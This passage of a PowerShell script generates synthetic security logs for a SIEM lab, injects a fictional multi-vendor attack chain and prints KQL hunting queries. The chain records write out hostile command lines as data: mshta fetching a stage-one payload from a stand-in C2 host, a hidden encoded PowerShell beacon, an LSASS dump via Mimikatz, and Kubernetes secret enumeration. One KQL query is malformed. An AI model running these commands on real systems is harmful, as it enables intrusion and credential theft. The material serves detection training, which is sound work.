            DeviceName       = $victimHost.Name
            DeviceIP         = $victimHost.IP
            DeviceOS         = $victimHost.OS
            DeviceSite       = $victimHost.Site
            UserId           = $victimUser.Id
            UserName         = $victimUser.Name
            UserDept         = $victimUser.Dept
            UserPriv         = $victimUser.Priv
            SourceIP         = $victimHost.IP
            DestIP           = $c2IP
            Action           = "Left alone"          # ← policy gap — should have been Blocked
            ThreatCategory   = "Malware-C2"
            URLBlockedFQDN   = $c2FQDN
            URLBlockedIP     = $c2IP
            URLCategory      = "command-and-control"
            URLCategory_Sym  = "Malicious Sources/Malnets"
            ScanType         = "Inline Proxy"
            SignatureVersion  = "20241201.14"
            EngineVersion    = "14.3.9905.7002"
            Note             = "Category newly classified — policy not yet updated for this URL category"
            CaseId           = $caseId
        } | ConvertTo-Json -Compress
        SourceVendor  = "EndpointVendor1"
        FileName      = "sep-web-chain-$(($baseTs).ToString('yyyyMMdd')).log"
    }

    # ────────────────────────────────────────────────────────────────────────
    # T+2  EndpointVendor2 — mshta.exe drops encoded PowerShell (Initial Access → Execution)
    # ────────────────────────────────────────────────────────────────────────
    $all["EndpointVendor2"] = @()
    $all["EndpointVendor2"] += @{
        TimeGenerated = ChainTs 2
        RawData = @{
            EventId           = "CS-CHAIN-01"
            CorrelationId     = $correlationId
            AttackChain       = $true
            ChainStep         = "3/10 — Malicious attachment executes mshta.exe dropper"
            Vendor            = "EndpointVendor2"
            Severity          = "High"
            SeverityNum       = 8
            DeviceName        = $victimHost.Name
            DeviceIP          = $victimHost.IP
            DeviceOS          = $victimHost.OS
            DeviceSite        = $victimHost.Site
            UserId            = $victimUser.Id
            UserName          = $victimUser.Name
            UserDept          = $victimUser.Dept
            UserPriv          = $victimUser.Priv
            SourceIP          = $victimHost.IP
            DestIP            = $c2IP
            Action            = "New"
            AgentId           = "aid-001a2b3c4d01"
            SensorVersion     = "7.14.15003.0"
            DetectionType     = "Indicator of Attack"
            MitreAttackId     = "T1566.001"
            MitreTechnique    = "Spearphishing Attachment"
            MitreTactic       = "Initial Access"
            ProcessId         = 7742
            ParentProcessName = "winword.exe"
            CommandLine       = "mshta.exe https://$c2FQDN/update/stage1.hta"
            ProcessTreeDepth  = 3
            SHA256            = $malwareHash
            FileCreated       = "C:\Users\$($victimUser.Name)\AppData\Local\Temp\$malwareFile"
            NetworkConn       = $true
            RemoteIP          = $c2IP
            RemotePort        = $c2Port
            DetectionStatus   = "New"
            Suppressed        = $false
            PatternId         = 41001
            eagleHostLink    = "https://eagle.EndpointVendor2.com/activity/detections/detail/CS-CHAIN-01"
            CaseName          = $caseId
            Note              = "Parent process winword.exe spawned mshta — document macro execution"
        } | ConvertTo-Json -Compress
        SourceVendor  = "EndpointVendor2"
        FileName      = "eagle-chain-$(($baseTs).ToString('yyyyMMdd')).json"
    }

    # ────────────────────────────────────────────────────────────────────────
    # T+3  EndpointVendor2 — LSASS dump + encoded PowerShell (Credential Access)
    # ────────────────────────────────────────────────────────────────────────
    $all["EndpointVendor2"] += @{
        TimeGenerated = ChainTs 3
        RawData = @{
            EventId           = "CS-CHAIN-02"
            CorrelationId     = $correlationId
            AttackChain       = $true
            ChainStep         = "4/10 — LSASS memory dump + encoded PowerShell beacon"
            Vendor            = "EndpointVendor2"
            Severity          = "Critical"
            SeverityNum       = 10
            DeviceName        = $victimHost.Name
            DeviceIP          = $victimHost.IP
            DeviceOS          = $victimHost.OS
            DeviceSite        = $victimHost.Site
            UserId            = $victimUser.Id
            UserName          = $victimUser.Name
            UserDept          = $victimUser.Dept
            UserPriv          = $victimUser.Priv
            SourceIP          = $victimHost.IP
            DestIP            = $c2IP
            Action            = "True Positive"
            AgentId           = "aid-001a2b3c4d01"
            SensorVersion     = "7.14.15003.0"
            DetectionType     = "Machine Learning"
            MitreAttackId     = "T1003.001"
            MitreTechnique    = "LSASS Memory Dump"
            MitreTactic       = "Credential Access"
            ProcessId         = 9128
            ParentProcessName = "mshta.exe"
            CommandLine       = "powershell.exe -NoP -NonI -W Hidden -Enc $encodedPS"
            ProcessTreeDepth  = 4
            SHA256            = "7fc8b97d" + (-join ((1..56) | ForEach-Object { "0123456789abcdef"[(RandInt 0 16)] }))
            FileCreated       = "C:\Windows\Temp\lsass.dmp"
            NetworkConn       = $true
            RemoteIP          = $c2IP
            RemotePort        = $c2Port
            DetectionStatus   = "True Positive"
            Suppressed        = $false
            PatternId         = 41002
            eagleHostLink    = "https://eagle.EndpointVendor2.com/activity/detections/detail/CS-CHAIN-02"
            CaseName          = $caseId
            Note              = "Mimikatz sekurlsa::logonpasswords executed in-memory — credential material likely extracted"
        } | ConvertTo-Json -Compress
        SourceVendor  = "EndpointVendor2"
        FileName      = "eagle-chain-$(($baseTs).ToString('yyyyMMdd')).json"
    }

    # ────────────────────────────────────────────────────────────────────────
    # T+4  FwVendor2 — outbound C2 beacon accepted (policy blind spot)
    # ────────────────────────────────────────────────────────────────────────
    $all["FwVendor2"] = @()
    $all["FwVendor2"] += @{
        TimeGenerated = ChainTs 4
        RawData = @{
            EventId         = "CP-CHAIN-01"
            CorrelationId   = $correlationId
            AttackChain     = $true
            ChainStep       = "5/10 — Outbound C2 beacon accepted by firewall (blind spot)"
            Vendor          = "FwVendor2"
            Product         = "VPN-1 & FireWall-1"
            Blade           = "Network Policy"
            Category        = "Firewall"
            RuleName        = "Allow_Corp_Internet"   # overly broad rule — C2 slipped through
            RuleNum         = 7
            Action          = "Accept"                # ← should have been Drop
            Severity        = "Critical"
            SeverityNum     = 10
            DeviceName      = "DMZ-GW-02"
            DeviceIP        = "172.16.1.2"
            DeviceOS        = "FwVendor2 R80.40"
            DeviceSite      = "DMZ"
            UserId          = $victimUser.Id
            UserName        = $victimUser.Name
            UserDept        = $victimUser.Dept
            UserPriv        = $victimUser.Priv
            SourceIP        = $victimHost.IP
            DestIP          = $c2IP
            Protocol        = "TCP"
            SourcePort      = 54231
            DestPort        = $c2Port
            PacketsIn       = 12
            PacketsOut      = 9
            BytesIn         = 4096
            BytesOut        = 1380
            PolicyName      = "Standard_1"
            LogType         = "Log"
            SessionId       = "A1B2C3D4"
            Note            = "C2 beacon over HTTPS — indistinguishable from legit traffic without TLS inspection"
            CaseId          = $caseId
        } | ConvertTo-Json -Compress
        SourceVendor  = "FwVendor2"
        FileName      = "FwVendor2-fw-chain-$(($baseTs).ToString('yyyyMMdd')).log"
    }

    # ────────────────────────────────────────────────────────────────────────
    # T+5  FwVendor2 — lateral movement SMB WIN-PROD-01 → WIN-PROD-02
    # ────────────────────────────────────────────────────────────────────────
    $all["FwVendor2"] += @{
        TimeGenerated = ChainTs 5
        RawData = @{
            EventId         = "CP-CHAIN-02"
            CorrelationId   = $correlationId
            AttackChain     = $true
            ChainStep       = "6/10 — SMB lateral movement to WIN-PROD-02 using stolen credentials"
            Vendor          = "FwVendor2"
            Product         = "VPN-1 & FireWall-1"
            Blade           = "Intrusion Prevention"
            Category        = "IPS"
            RuleName        = "Alert_Sensitive_Servers"
            RuleNum         = 42
            Action          = "Accept"               # IPS in detect-only mode
            Severity        = "Critical"
            SeverityNum     = 10
            DeviceName      = "DMZ-GW-02"
            DeviceIP        = "172.16.1.2"
            DeviceOS        = "FwVendor2 R80.40"
            DeviceSite      = "DMZ"
            UserId          = $victimUser.Id
            UserName        = $victimUser.Name
            UserDept        = $victimUser.Dept
            UserPriv        = $victimUser.Priv
            SourceIP        = $victimHost.IP          # WIN-PROD-01 — patient zero
            DestIP          = $lateralHost.IP         # WIN-PROD-02 — lateral target
            Protocol        = "TCP"
            SourcePort      = 49812
            DestPort        = 445
            PacketsIn       = 84
            PacketsOut      = 61
            BytesIn         = 38400
            BytesOut        = 22016
            ThreatName      = "SMB.PsExec.LateralMovement"
            Confidence      = "High"
            LateralTarget   = $lateralSMBPath
            PolicyName      = "Standard_1"
            LogType         = "Log"
            SessionId       = "B2C3D4E5"
            Note            = "PsExec-style remote execution using $svcAcct credentials harvested from LSASS dump"
            CaseId          = $caseId
        } | ConvertTo-Json -Compress
        SourceVendor  = "FwVendor2"
        FileName      = "FwVendor2-ips-chain-$(($baseTs).ToString('yyyyMMdd')).log"
    }

    # ────────────────────────────────────────────────────────────────────────
    # T+6  FwVendor1 — DNS query for C2 domain (WildFire: malware)
    # ────────────────────────────────────────────────────────────────────────
    $all["FwVendor1"] = @()
    $all["FwVendor1"] += @{
        TimeGenerated = ChainTs 6
        RawData = @{
            EventId         = "PA-CHAIN-01"
            CorrelationId   = $correlationId
            AttackChain     = $true
            ChainStep       = "7/10 — DNS query for C2 FQDN — WildFire verdict: malware"
            Vendor          = "FwVendor1"
            Severity        = "Critical"
            SeverityNum     = 10
            DeviceName      = "DMZ-GW-01"
            DeviceIP        = "172.16.1.1"
            DeviceOS        = "PAN-OS 10.2"
            DeviceSite      = "DMZ"
            UserId          = $victimUser.Id
            UserName        = $victimUser.Name
            UserDept        = $victimUser.Dept
            UserPriv        = $victimUser.Priv
            SourceIP        = $victimHost.IP
            DestIP          = $c2IP
            Action          = "sinkhole"
            LogType         = "DNS"
            Subtype         = "dns"
            DnsQueryFQDN    = $c2FQDN
            DnsResponseIP   = $c2IP
            DnsRType        = "A"
            DnsTTL          = 30
            DnsCategory     = "Malware-C2"
            DnsIsConsumer   = $false
            DnsThreat       = $true
            WildfireVerdict = "malware"
            ThreatName      = "Cobalt.Strike.Malleable"
            ThreatId        = 86601
            SrcZone         = "Trust"
            DstZone         = "Untrust"
            App             = "dns"
            Rule            = "Block_Threats"
            Protocol        = "udp"
            SrcPort         = 53291
            DstPort         = 53
            BytesIn         = 98
            BytesOut        = 62
            PktsIn          = 1
            PktsOut         = 1
            SessionId       = 772341
            RepeatCount     = 7           # beaconed 7 times
            Serial          = "PA-VM-DMZ-GW-01"
            VSYS            = "vsys1"
            Note            = "C2 FQDN matches active threat intel feed — Cobalt Strike team server"
            CaseId          = $caseId
        } | ConvertTo-Json -Compress
        SourceVendor  = "FwVendor1"
        FileName      = "pan-dns-chain-$(($baseTs).ToString('yyyyMMdd')).log"
    }

    # ────────────────────────────────────────────────────────────────────────
    # T+7  FwVendor1 — C2 HTTPS tunnel allowed by broad rule (another blind spot)
    # ────────────────────────────────────────────────────────────────────────
    $all["FwVendor1"] += @{
        TimeGenerated = ChainTs 7
        RawData = @{
            EventId         = "PA-CHAIN-02"
            CorrelationId   = $correlationId
            AttackChain     = $true
            ChainStep       = "8/10 — C2 HTTPS exfil tunnel allowed (SSL inspection not enabled on rule)"
            Vendor          = "FwVendor1"
            Severity        = "Critical"
            SeverityNum     = 10
            DeviceName      = "DMZ-GW-01"
            DeviceIP        = "172.16.1.1"
            DeviceOS        = "PAN-OS 10.2"
            DeviceSite      = "DMZ"
            UserId          = $victimUser.Id
            UserName        = $victimUser.Name
            UserDept        = $victimUser.Dept
            UserPriv        = $victimUser.Priv
            SourceIP        = $victimHost.IP
            DestIP          = $c2IP
            Action          = "allow"                # ← blind spot — SSL not decrypted
            LogType         = "TRAFFIC"
            Subtype         = "end"
            URLCategory     = "command-and-control"
            SrcZone         = "Trust"
            DstZone         = "Untrust"
            App             = "ssl"
            Rule            = "Allow_Internet_Access"   # too broad
            Protocol        = "tcp"
            SrcPort         = 51443
            DstPort         = $c2Port
            BytesIn         = 284672      # ~278 KB — small staged payload
            BytesOut        = 14336
            PktsIn          = 201
            PktsOut         = 98
            SessionId       = 772399
            RepeatCount     = 1
            NAT_SrcIP       = "203.0.113.1"
            Serial          = "PA-VM-DMZ-GW-01"
            VSYS            = "vsys1"
            DecryptReason   = "exclude-rule"    # TLS inspection bypassed by rule exclusion
            Note            = "TLS inspection disabled on this rule — C2 payload delivered undetected. Enable Decrypt_Inspect profile."
            CaseId          = $caseId
        } | ConvertTo-Json -Compress
        SourceVendor  = "FwVendor1"
        FileName      = "pan-traffic-chain-$(($baseTs).ToString('yyyyMMdd')).log"
    }

    # ────────────────────────────────────────────────────────────────────────
    # T+8  Kubernetes — compromised svc account execs into kube-system pod
    # ────────────────────────────────────────────────────────────────────────
    $all["Kubernetes"] = @()
    $all["Kubernetes"] += @{
        TimeGenerated = ChainTs 8
        RawData = @{
            EventId          = "K8S-CHAIN-01"
            CorrelationId    = $correlationId
            AttackChain      = $true
            ChainStep        = "9/10 — Compromised svc_backup token used to exec into kube-system pod"
            Vendor           = "Kubernetes"
            Severity         = "Critical"
            SeverityNum      = 10
            DeviceName       = $kubeNode.Name
            DeviceIP         = $kubeNode.IP
            DeviceOS         = $kubeNode.OS
            DeviceSite       = $kubeNode.Site
            UserId           = "U006"
            UserName         = $svcAcct                 # harvested from LSASS / kubeconfig
            UserDept         = "IT-Ops"
            UserPriv         = "service"
            SourceIP         = $lateralHost.IP           # originating from lateral-moved host
            DestIP           = $kubeNode.IP
            Action           = "exec"
            ClusterName      = "cluster-prod-01"
            Namespace        = "kube-system"
            ResourceKind     = "Pod"
            ResourceName     = "coredns-77d9d66f46-x8k2p"
            WorkloadName     = "coredns"
            NodeName         = $kubeNode.Name
            Image            = "registry.k8s.io/coredns/coredns:v1.11.1"
            AuditVerb        = "exec"
            ApiGroup         = "core"
            ApiVersion       = "v1"
            UserAgent        = "kubectl/1.29"
            SourceComponent  = "external"
            EventType        = "Warning"
            EventReason      = "FailedMount"
            PolicyViolation  = "Privileged exec into kube-system pod"
            PolicyEngine     = "Falco"
            ExitCode         = 0
            RestartCount     = 0
            RequestedCPU     = "100m"
            RequestedMemory  = "128Mi"
            LimitCPU         = "200m"
            LimitMemory      = "256Mi"
            ImagePullPolicy  = "IfNotPresent"
            ServiceAccount   = $svcAcct
            Labels           = (@{ app="coredns"; "k8s-app"="kube-dns"; tier="control-plane" } | ConvertTo-Json -Compress)
            Note             = "kubectl exec from non-standard source IP using svc_backup kubeconfig — token likely extracted from compromised host"
            CaseId           = $caseId
        } | ConvertTo-Json -Compress
        SourceVendor  = "Kubernetes"
        FileName      = "k8s-audit-chain-$(($baseTs).ToString('yyyyMMdd')).json"
    }

    # ────────────────────────────────────────────────────────────────────────
    # T+9  Kubernetes — attempt to list/read cluster secrets via API server
    # ────────────────────────────────────────────────────────────────────────
    $all["Kubernetes"] += @{
        TimeGenerated = ChainTs 9
        RawData = @{
            EventId          = "K8S-CHAIN-02"
            CorrelationId    = $correlationId
            AttackChain      = $true
            ChainStep        = "10/10 — Secret enumeration via kube-apiserver (cluster-wide)"
            Vendor           = "Kubernetes"
            Severity         = "Critical"
            SeverityNum      = 10
            DeviceName       = $kubeNode.Name
            DeviceIP         = $kubeNode.IP
            DeviceOS         = $kubeNode.OS
            DeviceSite       = $kubeNode.Site
            UserId           = "U006"
            UserName         = $svcAcct
            UserDept         = "IT-Ops"
            UserPriv         = "service"
            SourceIP         = $lateralHost.IP
            DestIP           = $kubeNode.IP
            Action           = "list"
            ClusterName      = "corp-aks-cluster-01"
            Namespace        = "ALL"               # cluster-scoped request — all namespaces
            ResourceKind     = "Secret"
            ResourceName     = "*"
            WorkloadName     = "kube-apiserver"
            NodeName         = $kubeNode.Name
            Image            = "registry.k8s.io/kube-apiserver:v1.29.2"
            AuditVerb        = "list"
            ApiGroup         = "core"
            ApiVersion       = "v1"
            UserAgent        = "kubectl/1.29"
            SourceComponent  = "kube-apiserver"
            EventType        = "Warning"
            EventReason      = "Unhealthy"
            PolicyViolation  = "Cluster-wide Secret enumeration by non-admin service account"
            PolicyEngine     = "Falco"
            ExitCode         = 0
            RestartCount     = 0
            RequestedCPU     = "100m"
            RequestedMemory  = "128Mi"
            LimitCPU         = "200m"
            LimitMemory      = "256Mi"
            ImagePullPolicy  = "Always"
            ServiceAccount   = $svcAcct
            Labels           = (@{ component="apiserver"; tier="control-plane" } | ConvertTo-Json -Compress)
            SecretsEnumerated = 47            # number of secrets visible to this token
            Note             = "svc_backup bound to ClusterRole with list/get on Secrets — over-privileged. Rotate all secrets immediately."
            CaseId           = $caseId
        } | ConvertTo-Json -Compress
        SourceVendor  = "Kubernetes"
        FileName      = "k8s-audit-chain-$(($baseTs).ToString('yyyyMMdd')).json"
    }

    return $all
}

Write-Host "`n[GEN] Generating logs and ingesting..." -ForegroundColor Cyan

$vendorMap = @{
    "FwVendor2"  = { New-FwVendor2Records  }
    "EndpointVendor1"  = { New-EndpointVendor1Records  }
    "EndpointVendor2" = { New-EndpointVendor2Records }
    "FwVendor1"    = { New-FwVendor1Records  }
    "Kubernetes"  = { New-KubernetesRecords  }
}

foreach ($vendor in $vendorMap.Keys) {
    $streamName = "Custom-${TablePrefix}${vendor}_CL"
    Write-Host "`n[GEN] $vendor..." -ForegroundColor Yellow
    $records = & $vendorMap[$vendor]
    Send-LogBatch -StreamName $streamName -Records $records
}

# ── Easter egg: inject synthetic attack chain with 30% probability ──────────
$rollAttack = RandInt 1 100
if ($rollAttack -le 30) {
    Write-Host "`n[ATTACK] Rolling attack chain: $rollAttack/100 ≤ 30 — injecting 'Operation Borrowed Time'" -ForegroundColor Magenta
	
    $chainRecords = New-AttackChainRecords
    foreach ($vendor in $chainRecords.Keys) {
        $streamName = "Custom-${TablePrefix}${vendor}_CL"
        Write-Host "[ATTACK] → $vendor ($($chainRecords[$vendor].Count) events)" -ForegroundColor Magenta
        Send-LogBatch -StreamName $streamName -Records $chainRecords[$vendor]
    }
    Write-Host "[ATTACK] Chain injected. CorrelationId searchable via AttackChain=true in RawData." -ForegroundColor Magenta
} else {
    Write-Host "`n[ATTACK] No attack chain this run ($rollAttack/100 > 30)." -ForegroundColor DarkGray
}

Write-Host "`n[DONE] Ingestion complete at $(Get-Date -Format 'HH:mm:ss')" -ForegroundColor Cyan

# ============================================================
# 8.  Handy KQL snippets printed on first run
# ============================================================

if (-not $SkipInfraSetup) {
    Write-Host @"

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 Sample KQL to get started (Log Analytics)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

// All vendors — record counts
union SampleFwVendor2_CL, SampleEndpointVendor1_CL, SampleEndpointVendor2_CL, SampleFwVendor1_CL, SampleKubernetes_CL
| summarize arg_max(TimeGenerated,*), Count=count() by SourceVendor, FileName
| order by Count desc

// High/Critical events across all tables (parse from RawData)
union SampleFwVendor2_CL, SampleEndpointVendor1_CL, SampleEndpointVendor2_CL, SampleFwVendor1_CL, SampleKubernetes_CL
| extend raw = parse_json(RawData)
| where toint(raw.SeverityNum) >= 8
| project TimeGenerated, SourceVendor, Severity=tostring(raw.Severity),
          DeviceName=tostring(raw.DeviceName), DeviceIP=tostring(raw.DeviceIP),
          UserName=tostring(raw.UserName), Action=tostring(raw.Action),
          EventId=tostring(raw.EventId), SourceIP=tostring(raw.SourceIP), DestIP=tostring(raw.DestIP)

// EndpointVendor2 — MITRE ATT&CK mapping
SampleEndpointVendor2_CL
| extend raw = parse_json(RawData)
| project TimeGenerated, DeviceName=tostring(raw.DeviceName), UserName=tostring(raw.UserName),
          Tactic=tostring(raw.MitreTactic), Technique=tostring(raw.MitreTechnique),
          AttackId=tostring(raw.MitreAttackId), CommandLine=tostring(raw.CommandLine),
          DetectionType=tostring(raw.DetectionType), CaseName=tostring(raw.CaseName)

// Kubernetes — policy violations
SampleKubernetes_CL
| extend raw = parse_json(RawData)
| where isnotempty(tostring(raw.PolicyViolation))
| project TimeGenerated, Node=tostring(raw.DeviceName), UserName=tostring(raw.UserName),
          Namespace=tostring(raw.Namespace), Workload=tostring(raw.WorkloadName),
          Violation=tostring(raw.PolicyViolation), Engine=tostring(raw.PolicyEngine),
          Severity=tostring(raw.Severity)

// Per-user activity aggregated across all vendors (stable UserName for correlation)
union SampleFwVendor2_CL, SampleEndpointVendor1_CL, SampleEndpointVendor2_CL, SampleFwVendor1_CL, SampleKubernetes_CL
| extend raw = parse_json(RawData)
| summarize Events=count(), Vendors=make_set(SourceVendor), MaxSev=max(toint(raw.SeverityNum))
  by UserId=tostring(raw.UserId), UserName=tostring(raw.UserName), Dept=tostring(raw.UserDept)
| order by Events desc

// ── Operation Borrowed Time — full attack chain reconstruction ──────────────
// Find all chain events by CorrelationId and reconstruct the timeline
union SampleFwVendor2_CL, SampleEndpointVendor1_CL, SampleEndpointVendor2_CL, SampleFwVendor1_CL, SampleKubernetes_CL
| extend raw = parse_json(RawData)
| where tobool(raw.AttackChain) == true
| project TimeGenerated, SourceVendor,
          Step=tostring(raw.ChainStep),
          CorrelationId=tostring(raw.CorrelationId),
          CaseId=tostring(raw.CaseId),
          Action=tostring(raw.Action),
          Severity=tostring(raw.Severity),
          UserName=tostring(raw.UserName),
          SourceIP=tostring(raw.SourceIP),
          DestIP=tostring(raw.DestIP),
          Note=tostring(raw.Note)
| order by TimeGenerated asc

// Pivot on a specific CorrelationId (paste from above result)
// let cid = "<paste CorrelationId here>";
// union SampleFwVendor2_CL, SampleEndpointVendor1_CL, SampleEndpointVendor2_CL, SampleFwVendor1_CL, SampleKubernetes_CL
// | extend raw = parse_json(RawData)
// | where tostring(raw.CorrelationId) == cid
// | project TimeGenerated, SourceVendor, Step=tostring(raw.ChainStep), Action=tostring(raw.Action), Note=tostring(raw.Note)
// | order by TimeGenerated asc

// Blind spots — accepted/allowed events that are part of the attack chain
union SampleFwVendor2_CL, SampleFwVendor1_CL, SampleEndpointVendor1_CL
| extend raw = parse_json(RawData)
| where tobool(raw.AttackChain) == true
| where tostring(raw.Action) in ("Accept","allow","Left alone")
| project TimeGenerated, SourceVendor, Step=tostring(raw.ChainStep),
          Action=tostring(raw.Action), Rule=tostring(raw.RuleName),
          Note=tostring(raw.Note)
| order by TimeGenerated asc

// C2 IP correlation — find ALL events touching the C2 IP across vendors
union SampleFwVendor2_CL, SampleEndpointVendor1_CL, SampleEndpointVendor2_CL, SampleFwVendor1_CL, SampleKubernetes_CL
| extend raw = parse_json(RawData)
| where tostring(raw.DestIP) == "203.0.113.200" or tostring(raw.SourceIP) == 203.0.113.2001"
    or tostring(raw.RemoteIP) == "203.0.113.200" or tostring(raw.URLBlockedIP) == "203.0.113.200"
    or tostring(raw.DnsResponseIP) == "203.0.113.200" or tostring(raw.c2IP) == "203.0.113.200"
| project TimeGenerated, SourceVendor, Severity=tostring(raw.Severity),
          Action=tostring(raw.Action), UserName=tostring(raw.UserName),
          DeviceName=tostring(raw.DeviceName), Note=tostring(raw.Note)
| order by TimeGenerated asc

// Kubernetes privilege escalation — service account secret enumeration
SampleKubernetes_CL
| extend raw = parse_json(RawData)
| where tobool(raw.AttackChain) == true
| project TimeGenerated,
          Step=tostring(raw.ChainStep),
          ServiceAccount=tostring(raw.ServiceAccount),
          AuditVerb=tostring(raw.AuditVerb),
          Namespace=tostring(raw.Namespace),
          Resource=tostring(raw.ResourceKind),
          PolicyViolation=tostring(raw.PolicyViolation),
          SecretsEnumerated=toint(raw.SecretsEnumerated),
          Note=tostring(raw.Note)
| order by TimeGenerated asc
"@
}
